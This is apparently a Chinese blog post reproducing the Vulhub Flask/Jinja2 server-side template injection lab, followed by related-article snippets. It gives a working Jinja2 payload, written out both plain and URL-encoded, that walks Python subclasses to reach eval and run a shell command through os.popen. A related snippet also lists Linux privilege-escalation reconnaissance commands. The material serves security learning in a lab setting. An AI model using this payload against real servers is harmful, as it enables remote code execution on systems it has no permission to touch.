服务端模板注入（SSTI）漏洞

最新推荐文章于 2026-05-05 18:36:21 发布

原创最新推荐文章于 2026-05-05 18:36:21 发布 · 440 阅读

0 ·

本内容遵循CC 4.0 BY-SA版权协议

标签

#web安全

收录于

本文介绍如何在漏洞环境中，通过构造特定请求，利用catch_warnings模块的eval函数执行任意Python代码。POC实例展示了如何在docker-compose环境下进行操作，并演示了获取和利用eval功能的过程。

首先进入漏洞环境

构造所需漏洞

docker-compose up -d

在浏览器中访问

http://your-ip/?name={{233*233}}

获取eval函数并执行任意python代码的POC：

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

{% for b in c.__init__.__globals__.values() %}

{% if b.__class__ == {}.__class__ %}

{% if 'eval' in b.keys() %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

访问

http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

得到执行结果：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冰雪

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulhub靶场文件(不用积分)

05-18

我下的挺慢，估计其他人也有这个情况。使用Vulhub一键搭建漏洞测试靶场，下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d

Vulhub Flask SSTI漏洞复现

CyhDl666的博客

03-26

1448

文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现开始复现 flask-ssti漏洞以前有总结过整理的不够好今天重新整理一下题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)

参与评论您还未登录，请先登录后发表或查看评论

vulhub学习(3) flask-ssti 漏洞复现

yukinorong的博客

06-24

2517

环境准备漏洞环境选择vulhub ，如上述配置进入flask/ssti 打开docker环境这里可以看见环境启动成功由于我的vulhub配置在虚拟机上，不能直接用127访问。打开命令行 ifconfig，找到ip 192.x docker 启动环境会另外配置端口，利用docker ps查询。发现是8000 漏洞原理利用浏览器访问可以看见页面查看源码可以看到核心语句为 t = Template("hello " + name) 此处，函数利用get获取参数进入template

SSTI模板注入漏洞(vulhub 复现)

weixin_74790320的博客

02-18

2565

模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，，模板引擎会提供一套生成html代码的程序，，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。模板引擎也会提供沙，但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面，模板引擎有一定的防范机制，但是可以利用一定技术去绕过破解。

Flask（Jinja2） 服务端模板注入漏洞

浅笑996的博客

12-11

1490

原理参考文章： https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...

vulhub漏洞复现十五_flask

weixin_44193247的博客

01-26

1461

vulhub漏洞复现练习篇

什么是服务端模板注入漏洞（SSTI）

最新发布

weixin_45626840的博客

05-05

430

SSTI（服务器端模板注入）是一种Web安全漏洞，攻击者通过向模板引擎注入恶意指令来执行服务器端代码。其成因是后端动态生成HTML时，未对用户输入进行严格过滤，导致用户输入被直接拼接进模板指令中。模板引擎将用户输入误解析为模板语法并执行，从而可能引发远程代码执行等风险。这种漏洞常见于MVC架构中模板与数据混合处理的场景，修复需严格区分数据与代码的边界，对用户输入进行转义或过滤。

SSTI-服务端模板注入漏洞

weixin_41082546的博客

06-25

1535

原理：服务端模板注入与SQL注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。模板引擎模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，用于网站的模板引擎就会生成一个标准的HTML文档。参考：https://baike.baidu.co.

SSTI服务端模板注入漏洞

Z_l123的博客

03-18

4558

漏洞复现利用vulhub搭建靶场环境 docker-compose build docker-compose up -d 访问http://your-ip:8000/ 传入参数?name={{5*9}},可以得到如下结果，说明存在SSTI漏洞获取eval函数并执行任意python代码的POC： {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}.

jinja2模板注入_Flask（Jinja2） 服务端模板注入漏洞(SSTI)

weixin_33657499的博客

01-17

242

#flask Flask 是一个 web 框架。也就是说 Flask 为你提供工具，库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。 Flask 属于微框架(micro-framework)这一类别，微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点，优点是框架很轻量，更新时依赖少，并且专注安全...

Flask服务端模板(Jinja2) SSTI 注入漏洞

weixin_51387754的博客

11-22

1618

漏洞简介 flask/ssti漏洞，即: Flask（Jinja2） 服务端模板注入漏洞(SSTI)。Flask 是一个使用 Python 编写的轻量级 Web 应用框架，Flask 为你提供工具，库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。影响版本使用Flask框架开发并且使用Jinja2模板引擎，最重要的是模板内容可控。满足该条件的Fla

Flask（Jinja2）服务端模板注入漏洞——vulhub/flack/ssti

Stephen Wolf

10-31

1767

一、服务端模板注入漏洞简述：服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式，该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。二、利用搭的vulhub靶机漏洞复现 1、service docker start //进入虚拟机后开启docker服...

SSTI例题buu[Flask]SSTI

cuddlylm的博客

04-08

3602

方法一：手注打开只有这个访问http://your-ip/?name={{233233}}，得到54289，说明它执行了我们的命令，SSTI漏洞存在。这里的54289是233233的运算结果获取eval函数并执行任意python代码的POC： {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_

SSTI模板注入漏洞基础

2301_80913334的博客

06-07

1622

良好的文档、丰富的插件、包含开发服务器和调试器、集成支持单元测试、RESTful请求调度、支持安全cookies、基于Unicode。

SSTI---总结

wwwwyyyrre的博客

06-12

3737

1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素（默认最后一个元素），并且返回该元素的值。若.也被过滤，使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。

linux提权

weixin_51387754的博客

06-02

917

linux提权内核漏洞提权内核漏洞提权是指普通用户访问操作系统内核，利用内核漏洞将权限提升到root权限。通常内核漏洞提权步骤如下：（1）信息收集，例如查看当前用户权限、查看系统版本和内核版本（2）根据收集到的信息查找EXP （3）使用EXP提权 1.信息收集常用命令查看系统全部信息 uname -a 查看内核版本 uname -r 查看内核信息 cat /proc/version 查看CentOS版本 cat /etc/*-release 查看Ubuntu和Debian版本 cat /etc/

session,PIN码伪造学习(py flask)

竹盐笙熙的博客

03-12

3477

学习一下伪造session，PIN码的知识

SSTI漏洞模板扫描（flask、Werkzeup）

墨痕诉清风的博客

08-07

866

代码】SSTI漏洞模板扫描。

SSTI漏洞基础解析

weixin_43895765的博客

04-01

5746

🚩flask基础 flask是python编写的一个WEB应用程序框架，flask由Armin Ronacher带领的一个Pocco团队开发，flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI：Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask，注意，flask是包名，Flask是模块名 from flask import Flask # 初始化Flask app = Flask(